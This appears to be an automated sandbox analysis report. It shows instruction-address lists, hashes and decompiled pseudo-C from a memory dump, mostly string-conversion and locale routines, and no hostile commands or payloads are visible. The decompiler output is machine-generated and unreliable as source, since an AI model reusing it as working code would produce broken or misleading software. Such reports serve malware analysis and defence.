                    0x0140d46a
                    0x0140d46f
                    0x0140d486
                    0x0140d488
                    0x0140d48d
                    0x0140d491
                    0x0140d492
                    0x0140d494
                    0x0140d4e4
                    0x0140d4e9
                    0x00000000
                    0x0140d496
                    0x0140d496
                    0x0140d498
                    0x00000000
                    0x0140d49a
                    0x0140d49a
                    0x0140d49e
                    0x0140d4a4
                    0x0140d4a7
                    0x0140d4aa
                    0x0140d4b0
                    0x0140d4b3
                    0x0140d4b8
                    0x0140d4ba
                    0x0140d4bd
                    0x0140d4be
                    0x0140d4be
                    0x0140d4c4
                    0x0140d4c6
                    0x0140d4c8
                    0x0140d55c
                    0x0140d55f
                    0x0140d561
                    0x0140d563
                    0x0140d564
                    0x0140d565
                    0x0140d56a
                    0x0140d56f
                    0x0140d571
                    0x0140d5bb
                    0x0140d5bb
                    0x0140d5be
                    0x00000000
                    0x0140d5c4
                    0x0140d5c4
                    0x0140d5c6
                    0x0140d5c9
                    0x0140d5c9
                    0x0140d5cc
                    0x0140d5ce
                    0x00000000
                    0x0140d5d4
                    0x0140d5d4
                    0x0140d5da
                    0x00000000
                    0x0140d5e0
                    0x0140d5e0
                    0x0140d5e2
                    0x0140d5ea
                    0x0140d5ec
                    0x0140d5f1
                    0x0140d5f4
                    0x0140d5f6
                    0x00000000
                    0x0140d5fc
                    0x0140d5fc
                    0x0140d5ff
                    0x0140d601
                    0x0140d604
                    0x0140d607
                    0x00000000
                    0x0140d607
                    0x0140d5f6
                    0x0140d5da
                    0x0140d5ce
                    0x0140d573
                    0x0140d573
                    0x0140d575
                    0x00000000
                    0x0140d577
                    0x0140d57a
                    0x0140d580
                    0x0140d583
                    0x0140d586
                    0x0140d59a
                    0x0140d59a
                    0x0140d59d
                    0x00000000
                    0x00000000
                    0x0140d596
                    0x0140d599
                    0x0140d599
                    0x0140d599
                    0x0140d59f
                    0x0140d5a1
                    0x0140d5a9
                    0x0140d5ab
                    0x0140d5b0
                    0x0140d5b3
                    0x0140d5b5
                    0x0140d5b7
                    0x0140d60b
                    0x0140d60b
                    0x0140d60b
                    0x0140d588
                    0x0140d588
                    0x0140d58b
                    0x0140d58d
                    0x0140d58d
                    0x0140d611
                    0x0140d614
                    0x00000000
                    0x0140d61a
                    0x0140d61a
                    0x0140d61c
                    0x0140d61f
                    0x0140d61f
                    0x0140d621
                    0x0140d622
                    0x0140d622
                    0x0140d62e
                    0x0140d636
                    0x0140d639
                    0x0140d63a
                    0x0140d63c
                    0x0140d685
                    0x0140d686
                    0x00000000
                    0x0140d63e
                    0x0140d645
                    0x0140d64a
                    0x0140d64d
                    0x0140d64f
                    0x0140d691
                    0x0140d692
                    0x0140d693
                    0x0140d694
                    0x0140d695
                    0x0140d696
                    0x0140d69b
                    0x0140d69f
                    0x0140d6a2
                    0x0140d6a3
                    0x0140d6a6
                    0x0140d6a8
                    0x0140d6b1
                    0x0140d6b3
                    0x0140d6b5
                    0x0140d6b7
                    0x0140d6b9
                    0x0140d6b9
                    0x0140d6bc
                    0x0140d6bd
                    0x0140d6bd
                    0x0140d6b9
                    0x0140d6c2
                    0x0140d6c3
                    0x0140d6ce
                    0x0140d6d2
                    0x0140d6d4
                    0x0140d73b
                    0x0140d73b
                    0x00000000
                    0x0140d6d6
                    0x0140d6d6
                    0x0140d6d9
                    0x0140d72b
                    0x0140d72d
                    0x0140d733
                    0x00000000
                    0x0140d6db
                    0x0140d6db
                    0x0140d6de
                    0x0140d6de
                    0x0140d6e0
                    0x0140d6e0
                    0x0140d6e2
                    0x0140d6e2
                    0x0140d6e5
                    0x0140d6e5
                    0x0140d6e7
                    0x0140d6e8
                    0x0140d6e8
                    0x0140d6f0
                    0x0140d6f4
                    0x0140d6fe
                    0x0140d701
                    0x0140d706
                    0x0140d709
                    0x0140d70d
                    0x00000000
                    0x0140d70f
                    0x0140d717
                    0x0140d71c
                    0x0140d71f
                    0x0140d721
                    0x0140d740
                    0x0140d742
                    0x0140d743
                    0x0140d744
                    0x0140d745
                    0x0140d746
                    0x0140d747
                    0x0140d74c
                    0x0140d74f
                    0x0140d752
                    0x0140d753
                    0x0140d754
                    0x0140d755
                    0x0140d75b
                    0x0140d75d
                    0x0140d760
                    0x0140d78c
                    0x0140d78c
                    0x0140d78c
                    0x0140d791
                    0x0140d762
                    0x0140d762
                    0x0140d765
                    0x0140d76b
                    0x0140d770
                    0x0140d773
                    0x0140d775
                    0x00000000
                    0x0140d777
                    0x0140d779
                    0x0140d77c
                    0x0140d77e
                    0x0140d79a
                    0x0140d79c
                    0x0140d780
                    0x0140d780
                    0x0140d782
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140d782
                    0x0140d77e
                    0x00000000
                    0x0140d784
                    0x0140d784
                    0x0140d787
                    0x0140d787
                    0x00000000
                    0x0140d765
                    0x0140d793
                    0x0140d799
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140d721
                    0x00000000
                    0x0140d723
                    0x0140d723
                    0x0140d726
                    0x0140d726
                    0x00000000
                    0x0140d72a
                    0x0140d6d9
                    0x0140d6aa
                    0x0140d6aa
                    0x0140d736
                    0x0140d73a
                    0x0140d73a
                    0x0140d651
                    0x0140d65a
                    0x0140d662
                    0x0140d666
                    0x0140d66d
                    0x0140d673
                    0x0140d675
                    0x0140d677
                    0x0140d67c
                    0x0140d67c
                    0x0140d67f
                    0x0140d67f
                    0x00000000
                    0x0140d675
                    0x0140d64f
                    0x0140d63c
                    0x0140d614
                    0x0140d575
                    0x0140d4ce
                    0x0140d4ce
                    0x0140d4d1
                    0x0140d502
                    0x0140d502
                    0x0140d504
                    0x0140d514
                    0x0140d519
                    0x0140d51e
                    0x0140d524
                    0x0140d527
                    0x0140d529
                    0x00000000
                    0x0140d52b
                    0x0140d52b
                    0x0140d531
                    0x00000000
                    0x0140d533
                    0x0140d53d
                    0x0140d542
                    0x0140d547
                    0x0140d54a
                    0x0140d550
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140d550
                    0x0140d531
                    0x0140d506
                    0x0140d506
                    0x00000000
                    0x0140d506
                    0x0140d4d3
                    0x0140d4d3
                    0x0140d4d9
                    0x00000000
                    0x0140d4db
                    0x0140d4db
                    0x0140d4e0
                    0x0140d4e2
                    0x0140d552
                    0x0140d552
                    0x0140d558
                    0x0140d558
                    0x0140d55a
                    0x0140d4ef
                    0x0140d4ef
                    0x0140d4ef
                    0x0140d4f2
                    0x0140d4f3
                    0x0140d4fa
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140d4e2
                    0x0140d4d9
                    0x0140d4d1
                    0x0140d4c8
                    0x0140d498
                    0x0140d471
                    0x0140d471
                    0x0140d476
                    0x0140d47c
                    0x0140d4fd
                    0x0140d501
                    0x0140d501
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                    • String ID:
                    • API String ID: 1282221369-0
                    • Opcode ID: 83d71ce25b5ece7dc0296ecfdac727e835511e8f1694e588ddb0eb1b533558a6
                    • Instruction ID: 4aa9859f11dc72afe4352f57e8ef8ad70d928e3bbe696bffe8d4e8e2aba81129
                    • Opcode Fuzzy Hash: 83d71ce25b5ece7dc0296ecfdac727e835511e8f1694e588ddb0eb1b533558a6
                    • Instruction Fuzzy Hash: B06127B1D003016FDB23AFEF88846AA7FA4AF11324F15417FDE98E72E5E63195098794
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 56%
                    			E013C2F1B(intOrPtr* __ecx, void* __edx, void* __eflags) {
                    				void* _t43;
                    				void* _t46;
                    				void* _t65;
                    				intOrPtr* _t67;
                    				intOrPtr* _t68;
                    				void* _t82;
                    				intOrPtr _t83;
                    				void* _t84;
                    				intOrPtr _t86;
                    				void* _t87;
                    				void* _t88;
                    				void* _t90;
                    
                    				_t90 = __eflags;
                    				_t82 = __edx;
                    				_t68 = __ecx;
                    				_push(0x5c);
                    				E013F26C2(E014157A4);
                    				_t67 = _t68;
                    				 *((intOrPtr*)(_t87 - 0x1c)) = _t67;
                    				 *((intOrPtr*)(_t87 - 0x10)) =  *((intOrPtr*)(_t87 + 8));
                    				 *((intOrPtr*)(_t87 - 0x18)) =  *((intOrPtr*)(_t87 + 0x14));
                    				 *((intOrPtr*)(_t87 - 0x20)) = _t67;
                    				 *((intOrPtr*)(_t87 - 0x14)) =  *((intOrPtr*)(_t87 + 0x18));
                    				_t83 = E013F21A5(_t90, 0x40);
                    				 *((intOrPtr*)(_t87 - 0x1c)) = _t83;
                    				 *(_t87 - 4) =  *(_t87 - 4) & 0x00000000;
                    				_t91 = _t83;
                    				if(_t83 == 0) {
                    					_t43 = 0;
                    					__eflags = 0;
                    				} else {
                    					E013F5890(_t83, _t83, 0, 0x40);
                    					_t86 = E013F21A5(_t91, 0x40);
                    					_t88 = _t88 + 0x10;
                    					 *((intOrPtr*)(_t87 - 0x24)) = _t86;
                    					 *(_t87 - 4) = 1;
                    					if(_t86 == 0) {
                    						_t65 = 0;
                    						__eflags = 0;
                    					} else {
                    						E013F5890(_t83, _t86, 0, 0x40);
                    						_t88 = _t88 + 0xc;
                    						_push(0);
                    						_t65 = E013C2E8E(_t86);
                    					}
                    					_push(_t65);
                    					 *(_t87 - 4) = 0;
                    					_t43 = E013C2CEE(_t83);
                    				}
                    				_t16 = _t87 - 4;
                    				 *_t16 =  *(_t87 - 4) | 0xffffffff;
                    				_t93 =  *_t16;
                    				E013CE470(_t82,  *_t16, _t43, 0, 0,  *((intOrPtr*)(_t87 - 0x10)));
                    				_push(0);
                    				_push( *((intOrPtr*)(_t87 - 0x14)));
                    				 *(_t87 - 4) = 2;
                    				 *_t67 = 0x141b670;
                    				 *((intOrPtr*)(_t67 + 4)) = 0x141b764;
                    				_t84 = E013C1B86(_t87 - 0x68);
                    				_push(0);
                    				_push( *((intOrPtr*)(_t87 - 0x18)));
                    				 *(_t87 - 4) = 3;
                    				_t46 = E013C1B86(_t87 - 0x4c);
                    				_push(1);
                    				 *(_t87 - 4) = 4;
                    				_push(_t87 + 0xc);
                    				_push("Uppercase");
                    				_push(_t87 - 0x30);
                    				_t73 = E013C2139();
                    				_push( *(_t49 + 8) & 0x000000ff);
                    				 *(_t87 - 4) = 5;
                    				_push(_t87 + 0x10);
                    				_push("GroupSize");
                    				_t74 = E013C1E98(_t73,  *_t16);
                    				_push( *(_t52 + 8) & 0x000000ff);
                    				_push(_t46);
                    				_push("Separator");
                    				_t75 = E013C1FA8(_t74, _t84, _t93);
                    				_push( *(_t54 + 8) & 0x000000ff);
                    				_push(_t84);
                    				_push("Terminator");
                    				_push(E013C1FA8(_t75, _t84, _t93));
                    				E013E9C60(_t67);
                    				E013C3BEC(_t87 - 0x2c);
                    				 *((intOrPtr*)(_t87 - 0x30)) = 0x141a9ac;
                    				E013C3959(_t87 - 0x40);
                    				E013C3959(_t87 - 0x5c);
                    				return E013F269C(_t67);
                    			}















                    0x013c2f1b
                    0x013c2f1b
                    0x013c2f1b
                    0x013c2f1b
                    0x013c2f22
                    0x013c2f27
                    0x013c2f29
                    0x013c2f2f
                    0x013c2f35
                    0x013c2f3d
                    0x013c2f40
                    0x013c2f48
                    0x013c2f4b
                    0x013c2f4e
                    0x013c2f52
                    0x013c2f54
                    0x013c2f9f
                    0x013c2f9f
                    0x013c2f56
                    0x013c2f5b
                    0x013c2f67
                    0x013c2f69
                    0x013c2f6c
                    0x013c2f6f
                    0x013c2f75
                    0x013c2f8f
                    0x013c2f8f
                    0x013c2f77
                    0x013c2f7c
                    0x013c2f81
                    0x013c2f86
                    0x013c2f88
                    0x013c2f88
                    0x013c2f91
                    0x013c2f94
                    0x013c2f98
                    0x013c2f98
                    0x013c2fa4
                    0x013c2fa4
                    0x013c2fa4
                    0x013c2faf
                    0x013c2fb4
                    0x013c2fb6
                    0x013c2fbc
                    0x013c2fc3
                    0x013c2fc9
                    0x013c2fd5
                    0x013c2fd7
                    0x013c2fd9
                    0x013c2fdf
                    0x013c2fe3
                    0x013c2fea
                    0x013c2fef
                    0x013c2ff3
                    0x013c2ff7
                    0x013c2ffc
                    0x013c3005
                    0x013c300b
                    0x013c300f
                    0x013c3013
                    0x013c3014
                    0x013c301e
                    0x013c3024
                    0x013c3025
                    0x013c3026
                    0x013c3030
                    0x013c3036
                    0x013c3037
                    0x013c3038
                    0x013c3042
                    0x013c3045
                    0x013c304d
                    0x013c3055
                    0x013c305c
                    0x013c3064
                    0x013c3070

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3
                    • String ID: GroupSize$Separator$Terminator$Uppercase
                    • API String ID: 431132790-2439647881
                    • Opcode ID: 524a5c0faeb681adfa7b269ee50ead68151ac16307f1bebc688a22bca3dee1f6
                    • Instruction ID: 143151289e49c686d176d2d33f2c83c8ea39fbba9f6015dfb148e29070cd30ce
                    • Opcode Fuzzy Hash: 524a5c0faeb681adfa7b269ee50ead68151ac16307f1bebc688a22bca3dee1f6
                    • Instruction Fuzzy Hash: 40418971E0030AEEEB10EBA9CC05BEEBAB4AF65B08F14405DE614BB281D7B44D059B65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E014148BB(int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
                    				signed int _v8;
                    				char _v22;
                    				struct _cpinfo _v28;
                    				short* _v32;
                    				int _v36;
                    				char* _v40;
                    				int _v44;
                    				intOrPtr _v48;
                    				void* _v60;
                    				void* __ebp;
                    				signed int _t63;
                    				short* _t68;
                    				int _t70;
                    				signed int _t72;
                    				short* _t73;
                    				signed int _t76;
                    				short* _t86;
                    				int _t93;
                    				intOrPtr _t95;
                    				intOrPtr _t96;
                    				signed int _t106;
                    				char* _t108;
                    				char* _t109;
                    				void* _t114;
                    				void* _t115;
                    				intOrPtr _t116;
                    				intOrPtr _t117;
                    				intOrPtr* _t118;
                    				short* _t119;
                    				int _t120;
                    				int _t121;
                    				short* _t122;
                    				intOrPtr* _t123;
                    				signed int _t124;
                    				short* _t125;
                    
                    				_t63 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t63 ^ _t124;
                    				_t120 = _a20;
                    				_v44 = _a4;
                    				_v48 = _a8;
                    				_t67 = _a24;
                    				_v40 = _a24;
                    				_t118 = _a16;
                    				_v36 = _t118;
                    				if(_t120 <= 0) {
                    					if(_t120 >= 0xffffffff) {
                    						goto L2;
                    					} else {
                    						goto L5;
                    					}
                    				} else {
                    					_t120 = E014012C5(_t118, _t120);
                    					_t67 = _v40;
                    					L2:
                    					_t93 = _a28;
                    					if(_t93 <= 0) {
                    						if(_t93 < 0xffffffff) {
                    							goto L5;
                    						} else {
                    							goto L7;
                    						}
                    					} else {
                    						_t93 = E014012C5(_t67, _t93);
                    						L7:
                    						_t70 = _a32;
                    						if(_t70 == 0) {
                    							_t70 =  *( *_v44 + 8);
                    							_a32 = _t70;
                    						}
                    						if(_t120 == 0 || _t93 == 0) {
                    							if(_t120 != _t93) {
                    								if(_t93 <= 1) {
                    									if(_t120 <= 1) {
                    										if(GetCPInfo(_t70,  &_v28) == 0) {
                    											goto L5;
                    										} else {
                    											if(_t120 <= 0) {
                    												if(_t93 <= 0) {
                    													goto L36;
                    												} else {
                    													_t68 = 2;
                    													if(_v28 >= _t68) {
                    														_t108 =  &_v22;
                    														if(_v22 != 0) {
                    															_t123 = _v40;
                    															while(1) {
                    																_t116 =  *((intOrPtr*)(_t108 + 1));
                    																if(_t116 == 0) {
                    																	goto L15;
                    																}
                    																_t95 =  *_t123;
                    																if(_t95 <  *_t108 || _t95 > _t116) {
                    																	_t108 = _t108 + _t68;
                    																	if( *_t108 != 0) {
                    																		continue;
                    																	} else {
                    																		goto L15;
                    																	}
                    																}
                    																goto L63;
                    															}
                    														}
                    													}
                    													goto L15;
                    												}
                    											} else {
                    												_t68 = 2;
                    												if(_v28 >= _t68) {
                    													_t109 =  &_v22;
                    													if(_v22 != 0) {
                    														while(1) {
                    															_t117 =  *((intOrPtr*)(_t109 + 1));
                    															if(_t117 == 0) {
                    																goto L17;
                    															}
                    															_t96 =  *_t118;
                    															if(_t96 <  *_t109 || _t96 > _t117) {
                    																_t109 = _t109 + _t68;
                    																if( *_t109 != 0) {
                    																	continue;
                    																} else {
                    																	goto L17;
                    																}
                    															}
                    															goto L63;
                    														}
                    													}
                    												}
                    												goto L17;
                    											}
                    										}
                    									} else {
                    										L17:
                    										_push(3);
                    										goto L13;
                    									}
                    								} else {
                    									L15:
                    									_t68 = 1;
                    								}
                    							} else {
                    								_push(2);
                    								L13:
                    								_pop(_t68);
                    							}
                    						} else {
                    							L36:
                    							_t119 = 0;
                    							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t120, 0, 0);
                    							_v44 = _t72;
                    							if(_t72 == 0) {
                    								L5:
                    								_t68 = 0;
                    							} else {
                    								_t114 = _t72 + _t72;
                    								asm("sbb eax, eax");
                    								if((_t114 + 0x00000008 & _t72) == 0) {
                    									_t73 = 0;
                    									_v32 = 0;
                    									goto L45;
                    								} else {
                    									asm("sbb eax, eax");
                    									_t84 = _t72 & _t114 + 0x00000008;
                    									_t106 = _t114 + 8;
                    									if((_t72 & _t114 + 0x00000008) > 0x400) {
                    										asm("sbb eax, eax");
                    										_t86 = E0140131B(_t106, _t84 & _t106);
                    										_v32 = _t86;
                    										if(_t86 == 0) {
                    											goto L61;
                    										} else {
                    											 *_t86 = 0xdddd;
                    											goto L43;
                    										}
                    									} else {
                    										asm("sbb eax, eax");
                    										E013F2CE0();
                    										_t86 = _t125;
                    										_v32 = _t86;
                    										if(_t86 == 0) {
                    											L61:
                    											_t94 = _v32;
                    										} else {
                    											 *_t86 = 0xcccc;
                    											L43:
                    											_t73 =  &(_t86[4]);
                    											_v32 = _t73;
                    											L45:
                    											if(_t73 == 0) {
                    												goto L61;
                    											} else {
                    												_t121 = _a32;
                    												if(MultiByteToWideChar(_t121, 1, _v36, _t120, _t73, _v44) == 0) {
                    													goto L61;
                    												} else {
                    													_t76 = MultiByteToWideChar(_t121, 9, _v40, _t93, _t119, _t119);
                    													_v36 = _t76;
                    													if(_t76 == 0) {
                    														goto L61;
                    													} else {
                    														_t115 = _t76 + _t76;
                    														_t102 = _t115 + 8;
                    														asm("sbb eax, eax");
                    														if((_t115 + 0x00000008 & _t76) == 0) {
                    															_t122 = _t119;
                    															goto L56;
                    														} else {
                    															asm("sbb eax, eax");
                    															_t80 = _t76 & _t115 + 0x00000008;
                    															_t102 = _t115 + 8;
                    															if((_t76 & _t115 + 0x00000008) > 0x400) {
                    																asm("sbb eax, eax");
                    																_t122 = E0140131B(_t102, _t80 & _t102);
                    																_pop(_t102);
                    																if(_t122 == 0) {
                    																	goto L59;
                    																} else {
                    																	 *_t122 = 0xdddd;
                    																	goto L54;
                    																}
                    															} else {
                    																asm("sbb eax, eax");
                    																E013F2CE0();
                    																_t122 = _t125;
                    																if(_t122 == 0) {
                    																	L59:
                    																	_t94 = _v32;
                    																} else {
                    																	 *_t122 = 0xcccc;
                    																	L54:
                    																	_t122 =  &(_t122[4]);
                    																	L56:
                    																	if(_t122 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t93, _t122, _v36) == 0) {
                    																		goto L59;
                    																	} else {
                    																		_t94 = _v32;
                    																		_t119 = E01406D92(_t102, _v48, _a12, _v32, _v44, _t122, _v36, _t119, _t119, _t119);
                    																	}
                    																}
                    															}
                    														}
                    														E013F1B60(_t122);
                    													}
                    												}
                    											}
                    										}
                    									}
                    								}
                    								E013F1B60(_t94);
                    								_t68 = _t119;
                    							}
                    						}
                    					}
                    				}
                    				L63:
                    				return E013F268B(_t68, _v8 ^ _t124);
                    			}






































                    0x014148c3
                    0x014148ca
                    0x014148d2
                    0x014148d5
                    0x014148db
                    0x014148de
                    0x014148e1
                    0x014148e5
                    0x014148e8
                    0x014148ed
                    0x01414914
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x014148ef
                    0x014148f7
                    0x014148f9
                    0x014148fd
                    0x014148fd
                    0x01414902
                    0x01414920
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01414904
                    0x0141490d
                    0x01414922
                    0x01414922
                    0x01414927
                    0x0141492e
                    0x01414931
                    0x01414931
                    0x01414936
                    0x01414942
                    0x0141494f
                    0x0141495c
                    0x0141496f
                    0x00000000
                    0x01414971
                    0x01414973
                    0x014149a6
                    0x00000000
                    0x014149a8
                    0x014149aa
                    0x014149ae
                    0x014149b4
                    0x014149b7
                    0x014149b9
                    0x014149bc
                    0x014149bc
                    0x014149c1
                    0x00000000
                    0x00000000
                    0x014149c3
                    0x014149c7
                    0x014149d1
                    0x014149d6
                    0x00000000
                    0x014149d8
                    0x00000000
                    0x014149d8
                    0x014149d6
                    0x00000000
                    0x014149c7
                    0x014149bc
                    0x014149b7
                    0x00000000
                    0x014149ae
                    0x01414975
                    0x01414977
                    0x0141497b
                    0x01414981
                    0x01414984
                    0x01414986
                    0x01414986
                    0x0141498b
                    0x00000000
                    0x00000000
                    0x0141498d
                    0x01414991
                    0x0141499b
                    0x014149a0
                    0x00000000
                    0x014149a2
                    0x00000000
                    0x014149a2
                    0x014149a0
                    0x00000000
                    0x01414991
                    0x01414986
                    0x01414984
                    0x00000000
                    0x0141497b
                    0x01414973
                    0x0141495e
                    0x0141495e
                    0x0141495e
                    0x00000000
                    0x0141495e
                    0x01414951
                    0x01414951
                    0x01414953
                    0x01414953
                    0x01414944
                    0x01414944
                    0x01414946
                    0x01414946
                    0x01414946
                    0x014149dd
                    0x014149dd
                    0x014149dd
                    0x014149ea
                    0x014149f0
                    0x014149f5
                    0x01414916
                    0x01414916
                    0x014149fb
                    0x014149fb
                    0x01414a03
                    0x01414a07
                    0x01414a62
                    0x01414a64
                    0x00000000
                    0x01414a09
                    0x01414a0e
                    0x01414a10
                    0x01414a12
                    0x01414a1a
                    0x01414a3e
                    0x01414a43
                    0x01414a48
                    0x01414a4e
                    0x00000000
                    0x01414a54
                    0x01414a54
                    0x00000000
                    0x01414a54
                    0x01414a1c
                    0x01414a1e
                    0x01414a22
                    0x01414a27
                    0x01414a29
                    0x01414a2e
                    0x01414b43
                    0x01414b43
                    0x01414a34
                    0x01414a34
                    0x01414a5a
                    0x01414a5a
                    0x01414a5d
                    0x01414a67
                    0x01414a69
                    0x00000000
                    0x01414a6f
                    0x01414a77
                    0x01414a85
                    0x00000000
                    0x01414a8b
                    0x01414a94
                    0x01414a9a
                    0x01414a9f
                    0x00000000
                    0x01414aa5
                    0x01414aa5
                    0x01414aa8
                    0x01414aad
                    0x01414ab1
                    0x01414afd
                    0x00000000
                    0x01414ab3
                    0x01414ab8
                    0x01414aba
                    0x01414abc
                    0x01414ac4
                    0x01414ae1
                    0x01414aeb
                    0x01414aed
                    0x01414af0
                    0x00000000
                    0x01414af2
                    0x01414af2
                    0x00000000
                    0x01414af2
                    0x01414ac6
                    0x01414ac8
                    0x01414acc
                    0x01414ad1
                    0x01414ad5
                    0x01414b37
                    0x01414b37
                    0x01414ad7
                    0x01414ad7
                    0x01414af8
                    0x01414af8
                    0x01414aff
                    0x01414b01
                    0x00000000
                    0x01414b1a
                    0x01414b1a
                    0x01414b33
                    0x01414b33
                    0x01414b01
                    0x01414ad5
                    0x01414ac4
                    0x01414b3b
                    0x01414b40
                    0x01414a9f
                    0x01414a85
                    0x01414a69
                    0x01414a2e
                    0x01414a1a
                    0x01414b47
                    0x01414b4d
                    0x01414b4d
                    0x014149f5
                    0x01414936
                    0x01414902
                    0x01414b4f
                    0x01414b62

                    APIs
                    • GetCPInfo.KERNEL32(00AEE848,00AEE848,?,7FFFFFFF,?,?,01414B94,00AEE848,00AEE848,?,00AEE848,?,?,?,?,00AEE848), ref: 01414967
                    • MultiByteToWideChar.KERNEL32(00AEE848,00000009,00AEE848,00AEE848,00000000,00000000,?,01414B94,00AEE848,00AEE848,?,00AEE848,?,?,?,?), ref: 014149EA
                    • MultiByteToWideChar.KERNEL32(00AEE848,00000001,00AEE848,00AEE848,00000000,01414B94,?,01414B94,00AEE848,00AEE848,?,00AEE848,?,?,?,?), ref: 01414A7D
                    • MultiByteToWideChar.KERNEL32(00AEE848,00000009,00AEE848,00AEE848,00000000,00000000,?,01414B94,00AEE848,00AEE848,?,00AEE848,?,?,?,?), ref: 01414A94
                      • Part of subcall function 0140131B: HeapAlloc.KERNEL32(00000000,?,00000000,?,014013C1,?,00000000,?,00000003,01406A84), ref: 0140134D
                    • MultiByteToWideChar.KERNEL32(00AEE848,00000001,00AEE848,00AEE848,00000000,00AEE848,?,01414B94,00AEE848,00AEE848,?,00AEE848,?,?,?,?), ref: 01414B10
                    • __freea.LIBCMT ref: 01414B3B
                    • __freea.LIBCMT ref: 01414B47
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$__freea$AllocHeapInfo
                    • String ID:
                    • API String ID: 2171645-0
                    • Opcode ID: 4bc49f9499b04348651b192d504422efb1b26fff651adefe27b884b140eafcdf
                    • Instruction ID: 23ab52767f18360f1a82a4619b0cec6bfddb5f7d908e7a83e7d682849ee101bb
                    • Opcode Fuzzy Hash: 4bc49f9499b04348651b192d504422efb1b26fff651adefe27b884b140eafcdf
                    • Instruction Fuzzy Hash: CC91D472E102169AEF218E79C840FEFBFA6AF04754F1C415BEA15EB268D735D841C7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E0140E31D(void* __edx, char _a4) {
                    				void* _v8;
                    				void* _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				char _v28;
                    				void* _t53;
                    				void _t57;
                    				intOrPtr _t58;
                    				intOrPtr _t59;
                    				intOrPtr _t60;
                    				intOrPtr _t61;
                    				signed int _t64;
                    				signed int _t76;
                    				signed int _t78;
                    				signed int _t82;
                    				signed int _t86;
                    				char _t92;
                    				char _t100;
                    				void* _t101;
                    				signed int _t104;
                    				void* _t107;
                    				void* _t121;
                    				char* _t123;
                    				signed int _t127;
                    				intOrPtr* _t132;
                    				void* _t133;
                    				intOrPtr* _t134;
                    				char* _t139;
                    
                    				_t121 = __edx;
                    				_t100 = _a4;
                    				_v28 = _t100;
                    				_v24 = 0;
                    				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
                    					_v16 = 1;
                    					_t53 = E014009B2(_t101, 1, 0x50);
                    					_v8 = _t53;
                    					if(_t53 != 0) {
                    						_t104 = 0x14;
                    						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
                    						_t132 = E0140131B(0, 4);
                    						_t127 = 0;
                    						_v12 = _t132;
                    						E014012E1(0);
                    						_pop(_t107);
                    						if(_t132 != 0) {
                    							 *_t132 = 0;
                    							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
                    								_t133 = _v8;
                    								_t57 =  *0x1435348; // 0x1435340
                    								 *_t133 = _t57;
                    								_t58 =  *0x143534c; // 0x143a4f0
                    								 *((intOrPtr*)(_t133 + 4)) = _t58;
                    								_t59 =  *0x1435350; // 0x143a4f0
                    								 *((intOrPtr*)(_t133 + 8)) = _t59;
                    								_t60 =  *0x1435378; // 0x1435344
                    								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
                    								_t61 =  *0x143537c; // 0x143a4f4
                    								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
                    								L19:
                    								 *_v12 = 1;
